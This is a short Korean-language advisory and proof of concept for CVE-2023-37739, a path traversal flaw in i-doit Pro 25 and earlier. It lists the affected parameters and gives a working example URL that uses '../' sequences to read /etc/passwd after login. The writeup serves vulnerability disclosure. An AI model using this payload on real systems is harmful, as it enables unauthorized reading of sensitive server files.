
CVE-2023-37739에 대한 개념 증명 익스플로잇으로, i-doit Pro 25 이하에서 패스 트래버설(path traversal) 취약점입니다. 인증된 사용자가 조작된 moduleID 및 file 매개변수를 통해 민감한 파일을 읽을 수 있습니다.
i-doit Pro 25 및 이하 버전은 경로 순회(Path Traversal) 취약점에 취약합니다. 이 취약점을 통해 원격 인증된 공격자(낮은 권한 또는 높은 권한)는 사용자가 접근할 수 없는 위치로 이동할 수 있으며, 이를 사용하여 민감한 파일을 읽거나 접근할 수 있습니다.
제품 설명: i-doit은 synetics GmbH에서 개발한 웹 기반 IT 문서화 및 CMDB(구성 관리 데이터베이스)입니다. i-doit Pro는 소프트웨어의 상용 버전이며 유료 라이선스가 필요합니다. 추가 기능, 전문 지원, 정기적인 업데이트 및 개선 사항이 제공됩니다. 사용자는 i-doit Pro를 사용하기 위해 라이선스를 구매해야 하며, 비용은 사용자 수와 필요한 기능에 따라 다릅니다.
취약점 설명: 이 웹 애플리케이션은 인증된 모든 사용자가 접근해서는 안 되는 위치로 이동할 수 있도록 허용한다는 것을 발견했습니다. 이를 사용하여 민감한 파일을 읽거나 접근할 수 있습니다...
영향을 받는 웹페이지: /?moduleID 및 /index.php
영향을 받는 매개변수 및 구성 요소 1: ?moduleID=2&file_manager=image&file
영향을 받는 매개변수 및 구성 요소 2: ?viewMode=1100&objID=56&tvMode=1006&catgID=27&objTypeID=39&editMode=0&objGroupID=2&moduleID=2&file_manager=image&file=
Step 1: 유효한 사용자(낮은 권한 또는 높은 권한)로 로그인합니다. 아래 URL로 이동하여 읽거나 접근하려는 파일에 맞게 ../../../를 수정하세요.

예 1: http://IP/?moduleID=2&file_manager=image&file=../../../../../../..//etc/passwd


